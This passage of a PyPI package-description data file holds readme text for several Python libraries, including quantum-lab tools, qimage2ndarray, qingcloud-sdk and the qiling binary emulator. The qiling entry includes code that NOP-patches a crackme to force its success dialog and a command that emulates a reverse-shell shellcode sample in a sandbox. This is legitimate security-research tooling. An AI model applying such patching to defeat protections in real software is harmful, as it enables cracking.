plotted:consumer_dataset = MongoDataSetIOReader.load(name='experiment_42')\nconsumer_dataset.sync_from_storage(-1)\nplot(consumer_dataset)ExamplesPlot and measure with MemoryDataSetIOIn this example a MemoryDataSetIOWriter and MemoryDataSetIOReader pair is created using the MemoryDataSetIOFactory.\nFake measuremet is run on separate thread, feeding fake measurement data to in-memory storage that the consumer data set\nsyncs from with thesync_from_storage(timeout)method.importrandomimportthreadingimporttimeimportmatplotlib.pyplotaspltfromqilib.data_setimportDataSet,DataArrayfromqilib.data_set.memory_data_set_io_factoryimportMemoryDataSetIOFactoryx_dim=100y_dim=100stop_measuring=Falseio_reader,io_writer=MemoryDataSetIOFactory.get_reader_writer_pair()data_set_consumer=DataSet(storage_reader=io_reader)some_array=DataArray('some_array','label',shape=(x_dim,y_dim))data_set_producer=DataSet(storage_writer=io_writer,data_arrays=some_array)plt.ion()defplot_measured_data():fig,ax=plt.subplots()foriinrange(20):data_set_consumer.sync_from_storage(-1)ax.imshow(data_set_consumer.some_array,cmap='hot',interpolation='nearest')fig.canvas.draw()returnTruedefmeasure_data():whilenotstop_measuring:foriinrange(x_dim):line=[i+j*random.random()forjinrange(y_dim)]data_set_producer.add_data(i,{'some_array':line})time.sleep(0.02)measure_thread=threading.Thread(target=measure_data)measure_thread.start()stop_measuring=plot_measured_data()measure_thread.join()Plot and measure with MongoDataSetIOIn this example one script creates a new DataSet with MongoDataSetIOWriter that stores a copy of the data set in a\nunderlying mongodb which needs to be pre-installed as described above. By instantiating the DataSet with a\nMongoDataSetWriter all updates and additions to the DataSet are reflected in the database. To fetch the data set from\nthe database the static methodload(name, document_id)provided in MongoDataSetIOReader is used. The method returns a\nnew DataSet object that subscribes to all changes in the underlying data set and can be updated with thesync_from_storagemethod.In one console run scriptAandBin another one. 
Make sure start scriptAbeforeBas the former\ncreates the data set in the database that the latter attempts to load.Aimportrandomfromtimeimportsleepimportnumpyasnpfromqilib.data_setimportDataSet,DataArray,MongoDataSetIOWriterx_dim=100y_dim=100measurements=DataArray(name=\"measurements\",label=\"a-data\",unit=\"ma\",preset_data=np.NaN*np.ones((x_dim,y_dim)))writer=MongoDataSetIOWriter(name='experiment_42')data_set=DataSet(storage_writer=writer,name='experiment_42',data_arrays=measurements)foriinrange(x_dim):line=[i+j*random.random()forjinrange(y_dim)]data_set.add_data(i,{'measurements':line})sleep(0.5)data_set.finalize()Bimportmatplotlib.pyplotaspltfromqilib.data_setimportMongoDataSetIOReaderplt.ion()consumer_data_set=MongoDataSetIOReader.load(name='experiment_42')fig,ax=plt.subplots()whilenotconsumer_data_set.is_finalized:consumer_data_set.sync_from_storage(0)ax.imshow(consumer_data_set.measurements,cmap='hot',interpolation='nearest')fig.canvas.draw()"} +{"package": "qililab", "pacakge-description": "QililabQililab is a generic and scalable quantum control library used for fast characterization and calibration of quantum chips. Qililab also offers the ability to execute high-level quantum algorithms with your quantum hardware.ContributionsThank you for your interest in our project. While we appreciate your enthusiasm and interest in contributing, we would like to clarify our policy regarding external contributions.Our Contribution PolicyThis project is primarily intended for reference purposes, and we do not actively accept or manage external contributions, including pull requests and issue reports. Our development team maintains this codebase for internal use and does not have the capacity to review or merge contributions from the community.Why We Have This PolicyOur decision to limit external contributions is based on our specific project goals, resource constraints, and internal policies. While we understand the value of collaboration and open-source contributions, we have chosen to maintain this project as a reference rather than a collaborative, community-driven effort.Seeking Help and SupportIf you have questions about using this project or encounter issues, please feel free to open an issue in the repository for discussion. However, please be aware that our ability to provide support or address issues may be limited.Thank you for your understanding and for considering our project. 
We hope that you find it useful for your needs, and we wish you the best in your open-source endeavors.Sincerely,Qilimanjaro Quantum Tech"} +{"package": "qilimanjaro-portfolio", "pacakge-description": "Qilimanjaro PortfolioQilimanjaro algorithms portfolio repository packaged in a Python library"} +{"package": "qilimanjaroq-client", "pacakge-description": "Qilimanjaro Client LibraryClient library side to connect to Qilimanjaro Quantum Service and interact with Qilimanjaro Quantum devices and simulators."} +{"package": "qilimanjaroq-server", "pacakge-description": "Qilimanjaro Server LibraryServer library side to connect to Qilimanjaro Quantum Service and interact with Qilimanjaro Quantum devices and simulators."} +{"package": "qilin", "pacakge-description": "AI platform"} +{"package": "qiling", "pacakge-description": "Qiling's usecase, blog and related workQiling is an advanced binary emulation framework, with the following features:Emulate multi-platforms: Windows, MacOS, Linux, Android, BSD, UEFI, DOS, MBR, Ethereum Virtual MachineEmulate multi-architectures: 8086, X86, X86_64, ARM, ARM64, MIPS, RISCV, PowerPCSupport multiple file formats: PE, MachO, ELF, COM, MBRSupport Windows Driver (.sys), Linux Kernel Module (.ko) & MacOS Kernel (.kext) viaDemigodEmulates & sandbox code in an isolated environmentProvides a fully configurable sandboxProvides in-depth memory, register, OS level and filesystem level APIFine-grain instrumentation: allows hooks at various levels (instruction/basic-block/memory-access/exception/syscall/IO/etc)Provides virtual machine level API such as save and restore current execution stateSupports cross architecture and platform debugging capabilitiesBuilt-in debugger with reverse debugging capabilityAllows dynamic hotpatch on-the-fly running code, including the loaded libraryTrue framework in Python, making it easy to build customized security analysis tools on topQiling also made its way to various international conferences.2022:Black Hat, EUBlack Hat, MEA2021:Black Hat, USAHack In The Box, AmsterdamBlack Hat, Asia2020:Black Hat, EuropeBlack Hat, USABlack Hat, USA (Demigod)Black Hat, AsiaHack In The Box, Lockdown 001Hack In The Box, Lockdown 002Hack In The Box, CyberweekNullcon2019:Defcon, USAHitconZeronightsQiling is backed byUnicorn engine.Visit our websitehttps://www.qiling.iofor more information.LicenseThis project is released and distributed underfree software license GPLv2and later version.Qiling vs other EmulatorsThere are many open source emulators, but two projects closest to Qiling areUnicorn&Qemu usermode. This section explains the main differences of Qiling against them.Qiling vs Unicorn engineBuilt on top of Unicorn, but Qiling & Unicorn are two different animals.Unicorn is just a CPU emulator, so it focuses on emulating CPU instructions, that can understand emulator memory. Beyond that, Unicorn is not aware of higher level concepts, such as dynamic libraries, system calls, I/O handling or executable formats like PE, MachO or ELF. As a result, Unicorn can only emulate raw machine instructions, without Operating System (OS) contextQiling is designed as a higher level framework, that leverages Unicorn to emulate CPU instructions, but can understand OS: it has executable format loaders (for PE, MachO & ELF at the moment), dynamic linkers (so we can load & relocate shared libraries), syscall & IO handlers. 
For this reason, Qiling can run executable binary without requiring its native OSQiling vs Qemu usermodeQemu usermode does similar thing to our emulator, that is to emulate whole executable binaries in cross-architecture way. However, Qiling offers some important differences against Qemu usermode.Qiling is a true analysis framework, that allows you to build your own dynamic analysis tools on top (in friendly Python language). Meanwhile, Qemu is just a tool, not a frameworkQiling can perform dynamic instrumentation, and can even hotpatch code at runtime. Qemu does not do eitherNot only working cross-architecture, Qiling is also cross-platform, so for example you can run Linux ELF file on top of Windows. In contrast, Qemu usermode only run binary of the same OS, such as Linux ELF on Linux, due to the way it forwards syscall from emulated code to native OSQiling supports more platforms, including Windows, MacOS, Linux & BSD. Qemu usermode can only handle Linux & BSDInstallationPlease seesetup guidefile for how to install Qiling Framework.ExamplesThe example below shows how to use Qiling framework in the most striaghtforward way to emulate a Windows executable.fromqilingimportQilingif__name__==\"__main__\":# initialize Qiling instance, specifying the executable to emulate and the emulated system root.# note that the current working directory is assumed to be Qiling homeql=Qiling([r'examples/rootfs/x86_windows/bin/x86_hello.exe'],r'examples/rootfs/x86_windows')# start emulationql.run()The following example shows how a Windows crackme may be patched dynamically to make it always display the \"Congratulation\" dialog.fromqilingimportQilingdefforce_call_dialog_func(ql:Qiling):# get DialogFunc address from current stack framelpDialogFunc=ql.stack_read(-8)# setup stack memory for DialogFuncql.stack_push(0)ql.stack_push(1001)# IDS_APPNAMEql.stack_push(0x111)# WM_COMMANDql.stack_push(0)# push return addressql.stack_push(0x0401018)# resume emulation from DialogFunc addressql.arch.regs.eip=lpDialogFuncif__name__==\"__main__\":# initialize Qiling instanceql=Qiling([r'rootfs/x86_windows/bin/Easy_CrackMe.exe'],r'rootfs/x86_windows')# NOP out some codeql.patch(0x004010B5,b'\\x90\\x90')ql.patch(0x004010CD,b'\\x90\\x90')ql.patch(0x0040110B,b'\\x90\\x90')ql.patch(0x00401112,b'\\x90\\x90')# hook at an address with a callbackql.hook_address(force_call_dialog_func,0x00401016)ql.run()The below Youtube video shows how the above example works.Emulating ARM router firmware on Ubuntu X64 machineQiling Framework hot-patch and emulates ARM router's /usr/bin/httpd on a X86_64Bit UbuntuQiling's IDAPro Plugin: Instrument and Decrypt Mirai's SecretThis video demonstrate how Qiling's IDAPro plugin able to make IDApro run with Qiling instrumentation engineGDBserver with IDAPro demoSolving a simple CTF challenge with Qiling Framework and IDAProEmulating MBRQiling Framework emulates MBRQltoolQiling also provides a friendly tool namedqltoolto quickly emulate shellcode & executable binaries.With qltool, easy execution can be performed:With shellcode:$ ./qltool code --os linux --arch arm --format hex -f examples/shellcodes/linarm32_tcp_reverse_shell.hexWith binary file:$ ./qltool run -f examples/rootfs/x8664_linux/bin/x8664_hello --rootfs examples/rootfs/x8664_linux/With binary and GDB debugger enable:$ ./qltool run -f examples/rootfs/x8664_linux/bin/x8664_hello --gdb 127.0.0.1:9999 --rootfs examples/rootfs/x8664_linuxWith code coverage collection (UEFI only for now):$ ./qltool run -f 
examples/rootfs/x8664_efi/bin/TcgPlatformSetupPolicy --rootfs examples/rootfs/x8664_efi --coverage-format drcov --coverage-file TcgPlatformSetupPolicy.covWith json output (Windows mainly):$ ./qltool run -f examples/rootfs/x86_windows/bin/x86_hello.exe --rootfs examples/rootfs/x86_windows/ --console False --jsonContactGet the latest info from our websitehttps://www.qiling.ioContact us at emailinfo@qiling.io, or via Twitter@qiling_ioorWeiboCore developers, Key Contributors and etcPlease refer toCREDITS.md"} +{"package": "qi.LiveChat", "pacakge-description": "qi.LiveChat Package Readme=========================Overview--------qi.LiveChat is a simple ajax chat product for plone.It requires an external utility that handles message keeping. At the moment only an xmlrpc server is provided. However it is very easy to add other implementations in order to use sql or use a logging facility.Installation------------1) Using buildoutAdd qi.LiveChat to your eggs and zcml sections. Installation can also add a script called \"livechat_server\" to your buildout's bin directory (see \"Usage\"). In order to do thatadd the following section to your buildout[scripts]recipe = zc.recipe.eggeggs = qi.LiveChatand do not forget to add scripts to the parts list.2) Without buildoutThis package is an egg, if you don't use buildout put it in INSTANCE/lib/python and add a file named qi.LiveChat-configure.zcml in INSTANCE/etc/package-includes with the following line:You will of course need to run the qi.LiveChat/qi/LiveChat/server/xmlrpcServer.py script manually.Go to portal quick installer and install qi.LiveChat.Add a chat room and chat away!Usage-----In order to use the provided xmlrpc message keeper you have to run the qi.LiveChat/qi/LiveChat/server/xmlrpcServer.py script. If you used buildout and followed the directions above, there should exist a link named livechat_server provided for convenience inside your buildout's bin folder.Written by G. Gozadinos http://qiweb.netSmiley support code borrowed from PloneBoard.Changelog for qi.LiveChat(name of developer listed in brackets)qi.LiveChat - 0.2- Removed the need for twisted, now uses SimpleXMLRPCServer- Using buildout will add a link in /bin to the xmlrpc server[G. Gozadinos]qi.LiveChat - 0.1- Initial version.[G. Gozadinos]"} +{"package": "qilum", "pacakge-description": "Qilum is a statistical and utility library supplementing existing statistical libraries\nincluding numpy [1] and scipy [2].\nWe use numba library [3] to speed up some calculations.In this first version, we provide several random number generators. They are based on the\nC++ LOPOR library [4]\nand the article Canonical local algorithms for spin systems: heat bath\nand Hasting methods [5].\nWe respect the scipy.stats random number generator interface and any of the scipy.stats classes can be used to initialize qilum classes.The main classes are:Dist_reject. Construct an exact generator for any probability functions. This is the fastest method when you do not know how to calculate or inverse the cumulative [5].Dist_sum. Construct a sum of known distributionsDist_scale. Apply scaling for x and y, for any distributions, even negative scaling for xDist_cubicSpline. Create an approximate random number generator for any functions using cubic spline. If you need an exact random number generator, use Dist_reject. TheDist_cubicSplinecan be used instead ofscipy.stats.rv_histogram, if you need a smooth functionDist_walker. 
Create a very fast random number generator for discrete distributions.In addition, we expose the functionf_walkerwhich calculates the parameters of the Walker algorithm [6]The most up-to-date Qilum documentation can be found athttps://www.qilum.comThe source code can be found athttps://bitbucket.org/daminou_fr/qilumExample: Discrete Walker distribution Dist_walker# Define a discrete distribution with Walker algorithm \nimport qilum.stats as qs\nwalker = qs.Dist_walker(probabilities=[0.2, 0.5, 0.3], values=[0, 10, 2])\n# and call the random number generator\nrans = walker.rvs(size=100000)Example: Sum of distributions Dist_sum# exponential distributions left and right types\nexp_left = qs.Dist_scale(scipy.stats.expon(),loc_x=-1.000001, scale_x=-1, scale_y=2, name='Exp+')\nexp_right = qs.Dist_scale(scipy.stats.expon(),loc_x= -1, scale_x= 1, scale_y=2, name='Exp-')\n# sum of the distributions\ndist_sum = qs.Dist_sum([exp_left, exp_right]); \n# random numbers\nrans = dist_sum.rvs(100)Example: Rejection method distribution Dist_reject# generate a random generator for f_f(x) \ndef f_f(xs): return np.where((xs<-5) | (xs>5), 0, 3.*np.exp(-np.power(xs,4)/10.))\n# find a step function above f_f(x)\nxs = np.linspace(-6,6, 1001)\nys = f_f(xs)\nxs_step, ys_step = qs.f_max(xs, ys, 20) \nys_step *= 1.2 # just to be sure that our step function >= f_f() \n# create a distribution for this step function:\nhist_dist = scipy.stats.rv_histogram((ys_step, xs_step))\n# scale this diribution\ncumulative = qs.f_cumulative(xs_step, ys_step)[-1]\ndist_step = qs.Dist_scale(hist_dist, scale_y = cumulative, name='dist_step')\n# create dist_reject \ndist_reject = qs.Dist_reject(dist_step, f_f)\n# random numbers\nrans = dist_reject.rvs(100)References:[1] numpy:https://numpy.org[2] scipyhttps://www.scipy.org/[3] numbahttp://numba.pydata.org[4] C++ LOPOR library:http://www.damienloison.com/finance/LOPOR/index.html[5] Canonical local algorithms for spin systems: heat bath\nand Hasting methods:http://www.damienloison.com/articles/reference26.pdf[6] A.J. Walker, ACM Transaction on Mathematical Software 3 (1977) 253"} +{"package": "qim3d", "pacakge-description": "QIM3D (Quantitative Imaging in 3D)qim3Dis a Python library for quantitative imaging analysis in 3D. It provides functionality for handling data, as well as tools for visualization and analysis.This library contains the tools and functionalities of the QIM platform, accessible athttps://qim.dk/platformInstallationInstall the latest stable version by using pip:pipinstallqim3dOr clone this repository for the most recent version.UsageSome basic funtionalites are descibred here. 
The full documentation is still under development.Loading DataTo load image data from a file, useqim.io.load()importqim3d# Load a filevol=qim3d.io.load(\"path/to/file.tif\")# Load a file as a virtual stackvol=qim3d.io.load(\"path/to/file.tif\",virtual_stack=True)Visualize dataYou can easily check slices from your volume usingslicesimportqim3dimg=qim3d.examples.fly_150x256x256# By default shows the middle sliceqim3d.viz.slices(img)# Or we can specifly positionsqim3d.viz.slices(img,position=[0,32,128])# Parameters for size and colormap are also possibleqim3d.viz.slices(img,img_width=6,img_height=6,cmap=\"inferno\")GUI ComponentsThe library also provides GUI components for interactive data analysis and exploration.\nTheqim3d.guimodule contains various classes for visualization and analysis:importqim3dapp=qim3d.gui.iso3d.Interface()app.launch()GUIs can also be launched using the Qim3D CLI:$ qim3d gui --data-explorerContributingContributions toqim3dare welcome! If you find a bug, have a feature request, or would like to contribute code, please open an issue or submit a pull request.LicenseThis project is licensed under the MIT License."} +{"package": "qimacode", "pacakge-description": "No description available on PyPI."} +{"package": "qimage2ndarray", "pacakge-description": "qimage2ndarray is a small python extension for quickly converting\nbetween QImages and numpy.ndarrays (in both directions). These are\nvery common tasks when programming e.g. scientific visualizations in\nPython using PyQt4 as the GUI library.Supports conversion of scalar and RGB data, with arbitrary dtypes\nand memory layout, with and without alpha channels, into QImages\n(e.g. for display or saving using Qt).qimage2ndarray makes it possible to create ndarrays that areviewsinto a given QImage\u2019s memory.This allows for very efficient data handling and makes it possible\nto modify Qt image data in-place (e.g. 
for brightness/gamma or alpha\nmask modifications). Masked arrays are also supported and are converted into QImages\nwith transparent pixels. Supports recarrays (and comes with an appropriate dtype) for\nconvenient access to RGB(A) channels. Supports value scaling / normalization to 0..255 for convenient\ndisplay of arbitrary NumPy arrays. qimage2ndarray is stable and unit-tested."} +{"package": "qimen", "pacakge-description": "No description available on PyPI."} +{"package": "qimp", "pacakge-description": "Qimp\n![QImP Mascotte](https://github.com/Giacomo-Antonioli/QImP/blob/main/img/QImP.jpg?raw=true)\nQuantum image manipulation package wrapper for Qiskit.\nGitHub repo: https://github.com/Giacomo-Antonioli/qimp.git\nDocumentation: https://qimp.readthedocs.io\nFree software: MIT\nFeatures\nTODO\nQuickstart\nTODO\nCredits\nThis package was created with Cookiecutter and the fedejaure/cookiecutter-modern-pypackage project template."} +{"package": "qimpy", "pacakge-description": "QimPy (pronounced /'k\u026am-pa\u026a'/)\nis a Python package for Quantum-Integrated Multi-PhYsics.\nCoding style\nThe repository provides a .editorconfig with indentation and line-length rules,\nand a pre-commit configuration to run black and flake8 to enforce and verify style.\nPlease install this pre-commit hook by running pre-commit install within the working directory.\nWhile this hook will run automatically on files modified in each commit,\nyou can also use make precommit to manually run it on all code files.\nFunction/method signatures and class attributes must use type hints.\nDocument class attributes using doc comments on the type hints when possible.\nRun make typecheck to perform a static type check using mypy before pushing code.\nFor all log messages, use f-strings as far as possible for maximum readability.\nRun make test to invoke all configured pytest tests. To only run mpi or\nnon-mpi tests specifically, use make test-mpi or make test-nompi.\nBest practice: run make check to invoke the precommit, typecheck\nand test targets before committing code."} +{"package": "qimview", "pacakge-description": "Description\nqimview (qt-based image view) is a set of classes that are designed to visualize and compare images.\nIt uses Python as the main language, and includes some code in C++ or OpenGL shading language.\nMain features are:\nimage reader: read typical image formats (like jpeg and png) and also raw image formats (bayer images)\nimage cache: save image reading/uncompressing time by loading previously read images into a buffer\nimage viewer: different image viewers are available\nQT based without OpenGL\nOpenGL based\nimage viewer can have many features:\nzoom/pan\ndisplay cursor and image information\ndisplay histogram\nmultiple image viewer to compare a set of images\nvideo viewer is experimental and based on the python vlc binding\nimage filters can be applied:\nblack/white level\nsaturation\nwhite balance"} +{"package": "qin", "pacakge-description": "A fun collection of tools."} +{"package": "qin-brick", "pacakge-description": "No description available on PyPI."} +{"package": "qin-cli", "pacakge-description": "A fun collection of tools."} +{"package": "qindomClient", "pacakge-description": "No description available on PyPI."} +{"package": "qinfo-gui", "pacakge-description": "qinfo-gui\nA GUI for qinfo using qinfo-python and GTK 3.0.\nqinfo-gui has many of the features of qinfo but now automatically updates its information every 3 seconds.
Slow operations, like getting package counts, aren't repeated and only happen on initial loading. qinfo-gui uses the same configuration file and (mostly) takes the same configuration options as qinfo. qinfo-gui is currently in very early development. Not too much time has been put into this application.\nInstallation\npip install qinfo-gui\nUsage\n$ qinfo-gui --help\nusage: qinfo-gui [-h] [-c [CONFIG]] [-s]\n\nA gui for qinfo\n\noptions:\n  -h, --help            show this help message and exit\n  -c [CONFIG], --config [CONFIG]\n                        Use this config file instead of the one at default location.\n  -s, --hide_warnings   Hide non-critical warnings"} +{"package": "qinfo-python", "pacakge-description": "qinfo-python\nPython Bindings for qinfo.\nInstallation\npip install qinfo-python\nHow to compile\nBuild dependencies: Python3 (Cython), gcc, glibc, make, patchelf\ngit clone --recurse-submodules https://github.com/el-wumbus/qinfo-python\ncd qinfo-python\npip install -r ./requirements.txt\nmake package\nThe package is in the dist directory.\nUsage\nBelow is a short example of some of the functionality of this module:\n#!/usr/bin/env python3\nimport qinfo\nfrom sys import exit as sexit\nfrom os import environ, path\n\n\ndef main():\n    silent = False\n    # Read the default qinfo config from the user's home directory.\n    config_file = path.join(environ.get(\"HOME\"), \".config/.qinfo.conf\")\n    configuration_options = qinfo.parse_config(config_file, silent)\n    if configuration_options is None:\n        return 1\n    # Only query and print the CPU model if the config enables it.\n    if configuration_options[\"display_cpu\"]:\n        cpu = qinfo.cpu_model()\n        print(f\"CPU:{cpu}\")\n    return 0\n\n\nsexit(main())\nAvailable Functions & What They Return\navalible_memory() -> int\nReturns the available memory in kB.\ncore_count() -> int\nReturns the core count.\ncpu_model() -> string\nReturns the cpu model as a string.\nkernel_release() -> string\nReturns the release and name of the kernel.\nmotherboard_model() -> string\nReturns the model name of the motherboard along with the manufacturer.\nos_name() -> string\nReturns the operating system name (distro name) as a string.\nparse_config(config_file_location: string, silent: bool) -> dict\nReturns a dict of all the configuration options.\nthread_count() -> int\nReturns the thread count.\ntotal_memory() -> int\nReturns the total memory in kB.\nuptime() -> long\nReturns the uptime in seconds.\nversion() -> string\nReturns the version of qinfo being used.\nhostname() -> string\nReturns the hostname of the system as a string.\npackages() -> dict\nReturns a dict of the number of packages for each supported package manager.\nrootfs_age() -> dict\nReturns a dict of the age of the root file system.\nshell() -> string\nReturns a string containing the shell (or if none found, the calling process).\nusername() -> string\nReturns the username of the user running the program as a string.\nWhat the dictionaries look like\nparse_config() returns a dict of the configuration options and their values.\nThis looks similar to the following:\n{'display_cpu': 1,  # Display cpu name and core/thread info\n'display_etc_cpu': 0,  # Display extra cpu info\n'display_mem': 1,  # Display memory capacity and usage ratio\n'display_board': 1,  # Display motherboard info\n'display_hostname': 1,  # Display the computer's hostname\n'display_uptime': 1,  # Display the system uptime\n'display_gb': 1,  # Measure memory in gigabytes instead of kilobytes\n'display_kernel': 1,  # Display Kernel release version\n'display_logo': 1,  # Display a logo for the OS if supported\n'display_rootfs_birth': 1,  # Display the birthdate of the root file system\n'display_pkg_count': 1,  # Display the number of packages for every supported package manager\n'display_shell': 1,  # Display the shell calling the program\n'display_username': 1,  # Display the username of the user calling the program\n'display_os': 1,  # Display the os name\n'date_order': 0,  # supported formats are 
YYYY/MM/DD (0) and MM/DD/YYYY (1)'idcolor':'\\x1b[1;36m',# Color for the id column'txtcolor':'',# Color for the text column'logocolor':'\\x1b[0;31m'# Color for the logo}The *color values are ansi escape codes.\nThe rest are int values that are either1or0(a.k.a booleans).rootfs_age()returns a dict containing the date.\nThis will look like the following:{'year':2022,'month':8,'day':21}packages()returns a dict that looks something like the following:{'pacman':979,'apt':372,'apk':87,'flatpak':0,'snap':0}"} +{"package": "qinfpy", "pacakge-description": "QInfPyPython package for Quantum Information"} +{"package": "qing", "pacakge-description": "UNKNOWN"} +{"package": "qingchat", "pacakge-description": "Qingchat is a simple wechat framework, written in Python."} +{"package": "qingchat-server", "pacakge-description": "a listening server for qingchat, depend on qingchat"} +{"package": "qingcloud-cli", "pacakge-description": "qingcloud-cli is the command line interface for managing QingCloud resources,\nwith it you can check, create, delete and operate all your resources,\nit supports Linux, Mac and Windows for now.This CLI is licensed underApache Licence, Version 2.0.NoteRequires Python 2.6 or higher, for more information please seeQingCloud CLI DocumentationInstallationInstall viapip$ pip install qingcloud-cliIf not installed invirtualenv, maybesudois needed$ sudo pip install qingcloud-cliUpgrade to the latest version$ pip install --upgrade qingcloud-cliCommand Completionqingcloud-cli has auto-completion (only support Linux and Mac).If auto-completion doesn\u2019t take effect, please activate it manually.:$ source ~/.bash_profileIf still doesn\u2019t work, please input:$ complete -C qingcloud_completer qingcloudand add this command into your login shell (such as~/.bash_profile).Getting StartedTo use qingcloud-cli, there must be a configuration file to configure your ownqy_access_key_id,qy_secret_access_keyandzone, such as:qy_access_key_id: 'QINGCLOUDACCESSKEYID'\nqy_secret_access_key: 'QINGCLOUDSECRETACCESSKEYEXAMPLE'\nzone: 'pek1'access key can be applied for inQingcloud Console.\nzone is the Node ID where your resources are,\nand it can be checked in the switching node on the console,\nsuch aspek1,pek2,gd1,ap1.The configuration file is saved in~/.qingcloud/config.yamlby default,\nit also can be assigned by the parameter-f/path/to/configwhen executing the command.Input ParametersFor iaas service, the parameters of qingcloud-cli only includeintandstringtype.\nIf the parameters support the list passing,\nthe values shall be separated byEnglish comma. For example:qingcloud iaas describe-keypairs -k 'kp-bn2n77ow, kp-b2ivaf15' -L 2Sometimes, the parameter needs to be string in JSON format, such as:qingcloud iaas add-router-statics -r rtr-ba2nbge6 -s '[{\"static_type\":1,\"val1\":\"80\",\"val2\":\"192.168.99.2\",\"val3\":\"8000\"}]'For qs service, the parameters includeint,stringandlisttype.\nIf the parameters support the list passing,\nthe values shall be separated byspaces. 
For example:qingcloud qs set-bucket-acl -b mybucket -A QS_ACL_EVERYONE,READ usr-wmTc0avW,FULL_CONTROLCommand OutputThe returned result of Command is in JSON format.\nFor example, the returned result of describe-keypair of \u2018iaas\u2019 service.:{\n \"action\":\"DescribeKeyPairsResponse\",\n \"total_count\":2,\n \"keypair_set\":[\n {\n \"description\":null,\n \"encrypt_method\":\"ssh-rsa\",\n \"keypair_name\":\"kp 1\",\n \"instance_ids\":[\n \"i-ogbndull\"\n ],\n \"create_time\":\"2013-08-30T05:13:50Z\",\n \"keypair_id\":\"kp-bn2n77ow\",\n \"pub_key\":\"AAAAB3...\"\n },\n {\n \"description\":null,\n \"encrypt_method\":\"ssh-rsa\",\n \"keypair_name\":\"kp 2\",\n \"create_time\":\"2013-08-31T05:13:50Z\",\n \"keypair_id\":\"kp-b2ivaf15\",\n \"pub_key\":\"AAAAB3...\"\n }\n ],\n \"ret_code\":0\n}The returned result of list-objects of \u2018qs\u2019 service.:{\n \"name\": \"mybucket\",\n \"keys\": [\n {\n \"key\": \"myphoto.jpg\",\n \"size\": 67540,\n \"modified\": 1456226022,\n \"mime_type\": \"image/jpeg\",\n \"created\": \"2016-02-23T11:13:42.000Z\"\n },\n {\n \"key\": \"mynote.txt\",\n \"size\": 11,\n \"modified\": 1456298679,\n \"mime_type\": \"text/plain\",\n \"created\": \"2016-02-24T06:49:23.000Z\"\n }\n ],\n \"prefix\": \"\",\n \"owner\": \"qingcloud\",\n \"delimiter\": \"\",\n \"limit\": 20,\n \"marker\": \"mynote.txt\",\n \"common_prefixes\": []\n}"} +{"package": "qingcloud-hpc", "pacakge-description": "This repository allows you to access QingCloud HPC and control your resources from your applications.This SDK is licensed under Apache Licence, Version 2.0."} +{"package": "qingcloud-init", "pacakge-description": "Qinginit is a setup script for qingcloud."} +{"package": "qingcloudrc", "pacakge-description": "just enjoy"} +{"package": "qingcloud-sdk", "pacakge-description": "This repository allows you to accessQingCloudand control your resources from your applications.This SDK is licensed underApache Licence, Version 2.0.NoteRequires Python 2.6 or higher, compatible with Python 3,\nfor more information please seeQingCloud SDK DocumentationInstallationInstall viapip$ pip install qingcloud-sdkUpgrade to the latest version$ pip install --upgrade qingcloud-sdkInstall from sourcegit clone https://github.com/yunify/qingcloud-sdk-python.git\ncd qingcloud-sdk-python\npython setup.py installGetting StartedIn order to operate QingCloud IaaS or QingStor (QingCloud Object Storage),\nyou need applyaccess keyonqingcloud consolefirst.QingCloud IaaS APIPass access key id and secret key into methodconnect_to_zoneto create connection>>> import qingcloud.iaas\n>>> conn = qingcloud.iaas.connect_to_zone(\n 'zone id',\n 'access key id',\n 'secret access key'\n )Call API by using IAM roleIf you would like to call our APIs without access key and secret key (bad things would happen if they were lost or leaked)\nor if you want a finer access control over your instances, there is a easy way to do it :PGo to our IAM service, create an instance role and attach it to your instance.Create connection without access key and secret key.>>> import qingcloud.iaas\n>>> conn = qingcloud.iaas.connect_to_zone(\n 'zone id',\n None,\n None\n )The variableconnis the instance ofqingcloud.iaas.connection.APIConnection,\nwe can use it to call resource related methods. 
Example:# launch instances\n>>> ret = conn.run_instances(\n image_id='img-xxxxxxxx',\n cpu=1,\n memory=1024,\n vxnets=['vxnet-0'],\n login_mode='passwd',\n login_passwd='Passw0rd@()'\n )\n\n# stop instances\n>>> ret = conn.stop_instances(\n instances=['i-xxxxxxxx'],\n force=True\n )\n\n# describe instances\n>>> ret = conn.describe_instances(\n status=['running', 'stopped']\n )QingCloud QingStor APIPass access key id and secret key into methodconnectto create connection>>> import qingcloud.qingstor\n>>> conn = qingcloud.qingstor.connect(\n 'pek3a.qingstor.com',\n 'access key id',\n 'secret access key'\n )The variableconnis the instance ofqingcloud.qingstor.connection.QSConnection,\nwe can use it to create Bucket which is used for generating Key and MultiPartUpload.Example:# Create a bucket\n>>> bucket = conn.create_bucket('mybucket')\n\n# Create a key\n>>> key = bucket.new_key('myobject')\n>>> with open('/tmp/myfile') as f:\n>>> key.send_file(f)\n\n# Delete the key\n>>> bucket.delete_key('myobject')"} +{"package": "qingdian", "pacakge-description": "A small tool to check the any absentee.By comparing the left text panel with right text panel and it sort out the missing part.\u4eba\u8d24\u9f50(renxianqi aka qingdian)\uff0c\u4e00\u4e2a\u5c0f\u5de5\u5177\u7528\u6765\u67e5\u8be2\u51fa\u5e2d\u6d3b\u52a8\u7684\u4eba\u6570\u662f\u5426\u5230\u9f50\u4e86\u3002\u901a\u8fc7\u6bd4\u5bf9\u5de6\u8fb9\u8ddf\u53f3\u8fb9\u7684\u5185\u5bb9\uff0c\u8ba1\u7b97\u51fa\u5de6\u8fb9\u8fd8\u6709\u54ea\u4e9b\u4eba\u5458\u6ca1\u6709\u51fa\u5e2d/\u51fa\u73b0\u5728\u53f3\u8fb9\u9762\u677f\u3002Package hosted on [pypi] and powered by [pypi-seed]Installation / \u5b89\u88c5pip install renxianqi\u56fd\u5185\u6307\u5b9a\u955c\u50cf\u5b89\u88c5\uff1apip install renxianqi -i https://pypi.tuna.tsinghua.edu.cn/simple\u6216\u8005\u4e0b\u8f7d\u6e05\u70b9\uff08qingdian\uff09\uff1apip install qingdianpip install qingdian -i https://pypi.tuna.tsinghua.edu.cn/simpleMore Info\u4eba\u8d24\u9f50/\u4e07\u80fd\u6e05\u70b9\u5de5\u5177\uff0c\u9002\u7528\u4e8e\u4e00\u4e0b\u573a\u666f\uff1a\u6e05\u5355\u7c7b\u5185\u5bb9\u6bd4\u8f83\u8bfe\u65f6\u51fa\u52e4\u70b9\u540d\u6d3b\u52a8\u51fa\u5e2d\u60c5\u51b5\u6838\u5bf9\u7b49\u7b49\u573a\u666fAuthorlevin"} +{"package": "qingfengboke", "pacakge-description": "No description available on PyPI."} +{"package": "qing-framework", "pacakge-description": "Framework for building Data pipelines that scales.Installation====```pip install qing-framework```Usage=====Build your first worker-----------------------``` python# 